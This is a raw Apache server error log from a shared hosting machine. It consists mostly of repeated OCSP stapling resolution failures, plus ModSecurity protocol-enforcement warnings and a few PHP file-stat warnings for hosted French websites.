[Tue May 12 05:50:01.676565 2026] [security2:error] [pid 1820198:tid 1820214] [client 43.165.65.117:51084] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "happy-baby-box.fr"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agKjac1tk6y7yBJLpJo91QAAAI4"], referer: https://happy-baby-box.fr/
[Tue May 12 05:50:08.512716 2026] [security2:error] [pid 1808852:tid 1808868] [client 43.156.127.60:49642] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKjcBfeipD4uoG21Fo4aQAAAA0"]
[Tue May 12 05:50:17.304297 2026] [ssl:error] [pid 1842385:tid 1842415] (EAI 2)Name or service not known: [client 192.178.6.9:49645] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 05:50:17.304359 2026] [ssl:error] [pid 1842385:tid 1842415] AH01941: stapling_renew_response: responder error
[Tue May 12 05:50:17.798633 2026] [ssl:error] [pid 1808852:tid 1808855] (EAI 2)Name or service not known: [client 192.178.6.8:51723] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 05:50:17.798674 2026] [ssl:error] [pid 1808852:tid 1808855] AH01941: stapling_renew_response: responder error
[Tue May 12 05:50:19.329645 2026] [ssl:error] [pid 1808852:tid 1808876] (EAI 2)Name or service not known: [client 192.178.6.8:52888] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 05:50:19.329669 2026] [ssl:error] [pid 1808852:tid 1808876] AH01941: stapling_renew_response: responder error
[Tue May 12 05:50:19.836946 2026] [ssl:error] [pid 1825179:tid 1825221] (EAI 2)Name or service not known: [client 192.178.6.8:48844] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 05:50:19.836972 2026] [ssl:error] [pid 1825179:tid 1825221] AH01941: stapling_renew_response: responder error
[Tue May 12 05:50:20.399725 2026] [ssl:error] [pid 1844863:tid 1844890] (EAI 2)Name or service not known: [client 192.178.6.7:51743] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 05:50:20.399760 2026] [ssl:error] [pid 1844863:tid 1844890] AH01941: stapling_renew_response: responder error
[Tue May 12 05:50:22.260612 2026] [ssl:error] [pid 1808852:tid 1808858] (EAI 2)Name or service not known: [client 192.178.6.8:55046] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 05:50:22.260642 2026] [ssl:error] [pid 1808852:tid 1808858] AH01941: stapling_renew_response: responder error
[Tue May 12 05:50:23.365291 2026] [ssl:error] [pid 1808852:tid 1808878] (EAI 2)Name or service not known: [client 192.178.6.7:57737] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 05:50:23.365330 2026] [ssl:error] [pid 1808852:tid 1808878] AH01941: stapling_renew_response: responder error
[Tue May 12 05:50:23.955668 2026] [ssl:error] [pid 1844863:tid 1844878] (EAI 2)Name or service not known: [client 192.178.6.8:36675] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 05:50:23.955699 2026] [ssl:error] [pid 1844863:tid 1844878] AH01941: stapling_renew_response: responder error
[Tue May 12 05:50:28.040543 2026] [security2:error] [pid 1825179:tid 1825205] [client 43.166.130.123:44170] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/cuivrerie/"] [unique_id "agKjhNr1yOh9TvizezikrwAAAEc"]
[Tue May 12 05:50:40.147964 2026] [ssl:error] [pid 1825287:tid 1825312] (EAI 2)Name or service not known: [client 192.178.6.7:54851] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 05:50:40.148012 2026] [ssl:error] [pid 1825287:tid 1825312] AH01941: stapling_renew_response: responder error
[Tue May 12 05:50:40.688685 2026] [ssl:error] [pid 1842385:tid 1842406] (EAI 2)Name or service not known: [client 192.178.6.7:51376] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 05:50:40.688717 2026] [ssl:error] [pid 1842385:tid 1842406] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:41.204355 2026] [ssl:error] [pid 1844863:tid 1844882] (EAI 2)Name or service not known: [client 158.173.36.63:27847] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:41.204404 2026] [ssl:error] [pid 1844863:tid 1844882] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:41.223647 2026] [ssl:error] [pid 1820198:tid 1820212] (EAI 2)Name or service not known: [client 158.173.36.241:28641] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:41.223684 2026] [ssl:error] [pid 1820198:tid 1820212] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:41.609960 2026] [ssl:error] [pid 1844863:tid 1844878] (EAI 2)Name or service not known: [client 158.173.36.80:40151] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:41.609992 2026] [ssl:error] [pid 1844863:tid 1844878] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:42.009421 2026] [ssl:error] [pid 1842385:tid 1842398] (EAI 2)Name or service not known: [client 158.173.36.31:38265] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:42.009461 2026] [ssl:error] [pid 1842385:tid 1842398] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:42.410581 2026] [ssl:error] [pid 1808852:tid 1808878] (EAI 2)Name or service not known: [client 158.173.36.227:42695] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:42.410622 2026] [ssl:error] [pid 1808852:tid 1808878] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:42.805548 2026] [ssl:error] [pid 1844863:tid 1844888] (EAI 2)Name or service not known: [client 158.173.36.71:20573] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:42.805587 2026] [ssl:error] [pid 1844863:tid 1844888] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:43.223156 2026] [ssl:error] [pid 1844863:tid 1844883] (EAI 2)Name or service not known: [client 158.173.36.241:63203] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:43.223180 2026] [ssl:error] [pid 1844863:tid 1844883] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:43.617434 2026] [ssl:error] [pid 1842385:tid 1842393] (EAI 2)Name or service not known: [client 158.173.36.134:30177] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:43.617471 2026] [ssl:error] [pid 1842385:tid 1842393] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:44.018481 2026] [ssl:error] [pid 1820198:tid 1820206] (EAI 2)Name or service not known: [client 158.173.36.171:63275] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:44.018510 2026] [ssl:error] [pid 1820198:tid 1820206] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:44.366834 2026] [ssl:error] [pid 1844863:tid 1844879] (EAI 2)Name or service not known: [client 158.173.36.70:58619] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:44.366881 2026] [ssl:error] [pid 1844863:tid 1844879] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:44.759706 2026] [ssl:error] [pid 1842385:tid 1842394] (EAI 2)Name or service not known: [client 158.173.36.134:37281] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:44.759745 2026] [ssl:error] [pid 1842385:tid 1842394] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:45.165567 2026] [ssl:error] [pid 1808852:tid 1808863] (EAI 2)Name or service not known: [client 158.173.36.54:33069] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:45.165604 2026] [ssl:error] [pid 1808852:tid 1808863] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:45.562282 2026] [ssl:error] [pid 1825179:tid 1825198] (EAI 2)Name or service not known: [client 158.173.36.160:52521] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:45.562314 2026] [ssl:error] [pid 1825179:tid 1825198] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:45.905312 2026] [ssl:error] [pid 1820198:tid 1820223] (EAI 2)Name or service not known: [client 158.173.36.68:65087] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:45.905350 2026] [ssl:error] [pid 1820198:tid 1820223] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174179/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174179/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174179/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174179/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174179/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174179/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:51:46.302592 2026] [ssl:error] [pid 1842385:tid 1842397] (EAI 2)Name or service not known: [client 158.173.36.80:48287] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:46.302625 2026] [ssl:error] [pid 1842385:tid 1842397] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:46.650032 2026] [ssl:error] [pid 1825287:tid 1825326] (EAI 2)Name or service not known: [client 158.173.36.169:22683] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:46.650064 2026] [ssl:error] [pid 1825287:tid 1825326] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:47.006739 2026] [ssl:error] [pid 1825179:tid 1825219] (EAI 2)Name or service not known: [client 158.173.36.80:53039] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:47.006772 2026] [ssl:error] [pid 1825179:tid 1825219] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:47.353030 2026] [ssl:error] [pid 1820198:tid 1820220] (EAI 2)Name or service not known: [client 158.173.36.124:53533] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:47.353066 2026] [ssl:error] [pid 1820198:tid 1820220] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:47.709022 2026] [ssl:error] [pid 1842385:tid 1842390] (EAI 2)Name or service not known: [client 158.173.36.161:60289] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:47.709047 2026] [ssl:error] [pid 1842385:tid 1842390] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:48.101934 2026] [ssl:error] [pid 1825287:tid 1825307] (EAI 2)Name or service not known: [client 158.173.36.245:28579] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:48.101978 2026] [ssl:error] [pid 1825287:tid 1825307] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:48.514083 2026] [ssl:error] [pid 1808852:tid 1808875] (EAI 2)Name or service not known: [client 158.173.36.49:62059] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:48.514119 2026] [ssl:error] [pid 1808852:tid 1808875] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:48.708622 2026] [security2:error] [pid 1825179:tid 1825218] [client 43.153.208.49:60606] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agKj1Nr1yOh9Tvizezik6QAAAFQ"]
[Tue May 12 05:51:48.927039 2026] [ssl:error] [pid 1820198:tid 1820207] (EAI 2)Name or service not known: [client 158.173.36.85:57175] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:48.927078 2026] [ssl:error] [pid 1820198:tid 1820207] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:49.319824 2026] [ssl:error] [pid 1842385:tid 1842408] (EAI 2)Name or service not known: [client 158.173.36.45:59033] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:49.319868 2026] [ssl:error] [pid 1842385:tid 1842408] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:49.910471 2026] [ssl:error] [pid 1825179:tid 1825211] (EAI 2)Name or service not known: [client 158.173.36.169:58343] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:49.910508 2026] [ssl:error] [pid 1825179:tid 1825211] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:50.310163 2026] [ssl:error] [pid 1820198:tid 1820224] (EAI 2)Name or service not known: [client 158.173.36.227:49517] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:50.310203 2026] [ssl:error] [pid 1820198:tid 1820224] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:50.658262 2026] [ssl:error] [pid 1825287:tid 1825317] (EAI 2)Name or service not known: [client 158.173.36.4:32471] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:50.658290 2026] [ssl:error] [pid 1825287:tid 1825317] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:50.811391 2026] [security2:error] [pid 1844863:tid 1844869] [client 43.153.208.49:43324] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agKj1vaAnTZtx1_H_wy9iwAAAUA"], referer: http://castiglionecorporatefinance.fr
[Tue May 12 05:51:51.005735 2026] [ssl:error] [pid 1842385:tid 1842400] (EAI 2)Name or service not known: [client 158.173.36.29:50659] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:51.005771 2026] [ssl:error] [pid 1842385:tid 1842400] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:51.359678 2026] [ssl:error] [pid 1825179:tid 1825208] (EAI 2)Name or service not known: [client 158.173.36.169:22911] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:51.359715 2026] [ssl:error] [pid 1825179:tid 1825208] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:51.703071 2026] [ssl:error] [pid 1820198:tid 1820205] (EAI 2)Name or service not known: [client 158.173.36.161:34387] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:51.703108 2026] [ssl:error] [pid 1820198:tid 1820205] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:52.059318 2026] [ssl:error] [pid 1844863:tid 1844881] (EAI 2)Name or service not known: [client 158.173.36.12:35341] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:52.059355 2026] [ssl:error] [pid 1844863:tid 1844881] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:52.412912 2026] [ssl:error] [pid 1842385:tid 1842403] (EAI 2)Name or service not known: [client 158.173.36.169:35065] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:52.412952 2026] [ssl:error] [pid 1842385:tid 1842403] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:52.757868 2026] [ssl:error] [pid 1825287:tid 1825319] (EAI 2)Name or service not known: [client 158.173.36.70:20975] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:52.757926 2026] [ssl:error] [pid 1825287:tid 1825319] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:53.104621 2026] [ssl:error] [pid 1808852:tid 1808861] (EAI 2)Name or service not known: [client 158.173.36.57:22093] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:53.104660 2026] [ssl:error] [pid 1808852:tid 1808861] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:53.457457 2026] [ssl:error] [pid 1825179:tid 1825200] (EAI 2)Name or service not known: [client 158.173.36.160:65153] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:53.457496 2026] [ssl:error] [pid 1825179:tid 1825200] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:53.808112 2026] [ssl:error] [pid 1844863:tid 1844891] (EAI 2)Name or service not known: [client 158.173.36.240:59845] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:53.808152 2026] [ssl:error] [pid 1844863:tid 1844891] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:54.217229 2026] [ssl:error] [pid 1825287:tid 1825313] (EAI 2)Name or service not known: [client 158.173.36.240:54447] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:54.217267 2026] [ssl:error] [pid 1825287:tid 1825313] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:54.745924 2026] [ssl:error] [pid 1820198:tid 1820221] (EAI 2)Name or service not known: [client 158.173.36.210:56787] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:54.745954 2026] [ssl:error] [pid 1820198:tid 1820221] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:54.761216 2026] [security2:error] [pid 1808852:tid 1808867] [client 43.153.208.49:51532] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agKj2hfeipD4uoG21Fo4uAAAAAw"], referer: https://castiglionecorporatefinance.fr/
[Tue May 12 05:51:54.892773 2026] [autoindex:error] [pid 1844863:tid 1844874] [client 217.113.194.213:13473] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 05:51:55.119293 2026] [ssl:error] [pid 1825287:tid 1825318] (EAI 2)Name or service not known: [client 158.173.36.12:42869] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:55.119330 2026] [ssl:error] [pid 1825287:tid 1825318] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:55.554520 2026] [ssl:error] [pid 1808852:tid 1808859] (EAI 2)Name or service not known: [client 158.173.36.160:22967] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:55.554560 2026] [ssl:error] [pid 1808852:tid 1808859] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:56.018985 2026] [ssl:error] [pid 1820198:tid 1820208] (EAI 2)Name or service not known: [client 158.173.36.85:27085] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:56.019026 2026] [ssl:error] [pid 1820198:tid 1820208] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:56.402827 2026] [ssl:error] [pid 1844863:tid 1844893] (EAI 2)Name or service not known: [client 158.173.36.71:62181] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:56.402856 2026] [ssl:error] [pid 1844863:tid 1844893] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:56.805835 2026] [ssl:error] [pid 1842385:tid 1842405] (EAI 2)Name or service not known: [client 158.173.36.12:49315] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:56.805868 2026] [ssl:error] [pid 1842385:tid 1842405] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:57.213574 2026] [ssl:error] [pid 1825287:tid 1825315] (EAI 2)Name or service not known: [client 158.173.36.124:41699] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:57.213614 2026] [ssl:error] [pid 1825287:tid 1825315] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:57.609850 2026] [ssl:error] [pid 1808852:tid 1808874] (EAI 2)Name or service not known: [client 158.173.36.54:65369] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:57.609922 2026] [ssl:error] [pid 1808852:tid 1808874] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:58.049212 2026] [ssl:error] [pid 1842385:tid 1842399] (EAI 2)Name or service not known: [client 158.173.36.70:30761] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:58.049241 2026] [ssl:error] [pid 1842385:tid 1842399] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:58.408307 2026] [ssl:error] [pid 1825287:tid 1825321] (EAI 2)Name or service not known: [client 158.173.36.245:55899] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:58.408343 2026] [ssl:error] [pid 1825287:tid 1825321] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:58.751482 2026] [ssl:error] [pid 1808852:tid 1808855] (EAI 2)Name or service not known: [client 158.173.36.161:32459] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:58.751521 2026] [ssl:error] [pid 1808852:tid 1808855] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:59.103389 2026] [ssl:error] [pid 1825179:tid 1825202] (EAI 2)Name or service not known: [client 158.173.36.210:63073] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:59.103423 2026] [ssl:error] [pid 1825179:tid 1825202] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:59.453600 2026] [ssl:error] [pid 1844863:tid 1844884] (EAI 2)Name or service not known: [client 158.173.36.12:56601] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:59.453645 2026] [ssl:error] [pid 1844863:tid 1844884] AH01941: stapling_renew_response: responder error
[Tue May 12 05:51:59.807437 2026] [ssl:error] [pid 1842385:tid 1842401] (EAI 2)Name or service not known: [client 158.173.36.63:39515] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:51:59.807470 2026] [ssl:error] [pid 1842385:tid 1842401] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:00.160430 2026] [ssl:error] [pid 1825287:tid 1825330] (EAI 2)Name or service not known: [client 158.173.36.31:54499] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:00.160470 2026] [ssl:error] [pid 1825287:tid 1825330] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:00.541754 2026] [ssl:error] [pid 1825179:tid 1825222] (EAI 2)Name or service not known: [client 158.173.36.12:47021] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:00.541794 2026] [ssl:error] [pid 1825179:tid 1825222] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:00.906925 2026] [ssl:error] [pid 1820198:tid 1820203] (EAI 2)Name or service not known: [client 158.173.36.230:36705] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:00.906955 2026] [ssl:error] [pid 1820198:tid 1820203] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:01.305056 2026] [ssl:error] [pid 1808852:tid 1808876] (EAI 2)Name or service not known: [client 158.173.36.63:46691] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:01.305105 2026] [ssl:error] [pid 1808852:tid 1808876] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:01.703522 2026] [ssl:error] [pid 1820198:tid 1820212] (EAI 2)Name or service not known: [client 158.173.36.80:56761] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:01.703558 2026] [ssl:error] [pid 1820198:tid 1820212] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:02.251676 2026] [ssl:error] [pid 1825287:tid 1825323] (EAI 2)Name or service not known: [client 158.173.36.85:48061] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:02.251724 2026] [ssl:error] [pid 1825287:tid 1825323] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:02.956532 2026] [ssl:error] [pid 1842385:tid 1842412] (EAI 2)Name or service not known: [client 158.173.36.134:61965] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:02.956562 2026] [ssl:error] [pid 1842385:tid 1842412] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:03.300595 2026] [ssl:error] [pid 1825179:tid 1825209] (EAI 2)Name or service not known: [client 158.173.36.230:54217] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:03.300630 2026] [ssl:error] [pid 1825179:tid 1825209] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:03.650331 2026] [ssl:error] [pid 1844863:tid 1844888] (EAI 2)Name or service not known: [client 158.173.36.227:52197] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:03.650360 2026] [ssl:error] [pid 1844863:tid 1844888] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:04.002028 2026] [ssl:error] [pid 1825287:tid 1825328] (EAI 2)Name or service not known: [client 158.173.36.63:48671] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:04.002057 2026] [ssl:error] [pid 1825287:tid 1825328] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:04.356041 2026] [ssl:error] [pid 1808852:tid 1808870] (EAI 2)Name or service not known: [client 158.173.36.68:36311] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:04.356068 2026] [ssl:error] [pid 1808852:tid 1808870] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:04.707520 2026] [ssl:error] [pid 1844863:tid 1844877] (EAI 2)Name or service not known: [client 158.173.36.160:31515] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:04.707548 2026] [ssl:error] [pid 1844863:tid 1844877] AH01941: stapling_renew_response: responder error
